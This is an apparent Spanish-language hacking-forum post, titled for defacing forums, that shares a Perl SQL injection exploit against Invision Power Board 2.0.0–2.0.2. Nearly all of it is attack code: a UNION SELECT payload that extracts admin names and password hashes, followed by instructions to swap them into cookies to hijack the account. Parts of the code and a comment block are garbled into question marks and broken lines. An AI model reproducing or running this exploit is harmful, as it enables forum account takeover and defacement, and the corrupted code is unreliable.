Defaced Foros Univision 2.0 - 2.2
Bueno
Univision Power Board V2.0.0 - 2.0.2 SQL Inyection
Este es un xploit para los populares foros Univision version v2.0.0 al 2.0.2, el xploit esta escrito en perl
Código:
----------COMIENZO----------
#!/usr/bin/perl
use IO::Socket;
## Univision Power Board v2.0.0 - 2.0.2 sql injection exploit
## by RusH security team (www.rst.void.r u)
## coded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example:
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d 297ee3b1f78b56 79b3
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d 297ee3b1f78b56 79b3
## [>] PREFIX:
## [>] ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
##
## [~] SENDING QUERY...
##
##
## PREFIX: ibf_
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d 297ee3b1f78b56 79b3 ibf_
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d 297ee3b1f78b56 79b3
## [>] PREFIX: ibf_
## [>] ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
##
## [~] SENDING QUERY...
##
##
## --[ REPORT ]------------------------------------------------------------------------------------
## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e]
## ------------------------------------------------------------------------------------------------
## Now you need edit cookie and REPLACE new pass_hash and member_id values.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
##
?
? ? 




? 

?:
## 
?? pass_hash
?? 


? 
??!!! ? 

?? 
??
## ?? 
? 
? 
??
??
?? ??
??
?? 

##
?? 
. member_id
?? 

?? 
?? ?? 
. 
? ??
##
?? 
?? 


pass_hash =) 




?? ?? 
?
## 
?? pass_hash ? member_id ?
?? cookie ??
? ?? 
??
## 
? 

.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if (@ARGV < 5)
{
print "-------------------------------------------------------------------------rn";
print " Invision Power Board v2.0.0 - 2.0.2 sql injection exploitrn";
print "-------------------------------------------------------------------------rn";
print "usage:rn";
print "r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]rnrn";
print "SERVER - server where IPB installedrn";
print "/DIR/ - IPB directory or / for no directoryrn";
print "FORUM_NUM - number of existing forumrn";
print "TOPIC_NUM - number of existing topicrn";
print "SID - your session idrn";
print "[TABLE_PREFIX] - table prefix in databasern";
print "[USER_ID] - user id for exploitingrnrn";
print "e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0 662d721c207f81 784e ibf_rn";
print "-------------------------------------------------------------------------rn";
exit();
}
if (@ARGV < 6) { $get_table = 1; }
$server = $ARGV[0];
$dir = $ARGV[1];
$fnum = $ARGV[2];
$tnum = $ARGV[3];
$sid = $ARGV[4];
$prefix = $ARGV[5];
$id = $ARGV[6];
print "-----------------------------------------------------------------------------------------------rn";
print "[>] SERVER: $serverrn";
print "[>] DIR: $dirrn";
print "[>] FORUM: $fnumrn";
print "[>] TOPIC: $tnumrn";
print "[>] SID: $sidrn";
print "[>] PREFIX: $prefixrn";
print "[>] ID: $idrn";
print "-------------------------------------------------------------------------------------------rnrn";
$server =~ s/(http://)//eg;
$path = $dir;
$path .= "index.php?s=";
$path .= $sid;
$path .= "&act=Post&CODE=02&f=";
$path .= $fnum;
$path .= "&t=";
$path .= $tnum;
if ($get_table == 1)
{
$path .= "&qpid=r57"
}
else
{
$path .= "&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(58),
name,char(58),
member_login_k ey),1,1,1,1,1,1,1,1,1%20from%20";
$path .= $prefix;
$path .= "members";
$path .= ($id)?("%20WHERE%20id=$id%20")
"%20");
$path .= "/*";
}
print "[~] PREPARE TO CONNECT...rn";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server",
PeerPort => "80") || die "[-]
CONNECTION FAILED";
print "
print "[~] SENDING QUERY...rn";
print $socket "GET $path HTTP/1.1rn";
print $socket "Host: $serverrn";
print $socket "Accept: */*rn";
print $socket "Connection: closernrn";
print "
$suc =0;
if ($get_table == 1)
{
while ($answer = <$socket>)
{
if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print "PREFIX: $4rn";
$suc = 1; }
}
if (!$suc) { print "Exploit failedrn"; }
exit();
}
print "--[ REPORT ]---------------------------------------------------------------------------------rn";
while ($answer = <$socket>)
{
if ($answer =~ /^([^:]*)
[^:]*)
[a-z,0-9]{32})$/) { print "MEMBER_ID: [$1] NAME: [$2]
PASS_HASH: [$3]rn"; $suc = 1; }
}
print "------------------------------------------------------------------------------------------------rn";
if ($suc == 1) { print "Now you need edit cookie and REPLACE new pass_hash and
member_id values.rn";
exit(); }
else { print "Exploit failedrn"; }
----------FIN----------
Aqui he tenido que modificar algunas letras por emoticones ya que de no haberlo echo me afectaria el sistema al 100% y no podria hacer nada a menos que formateara la pc xD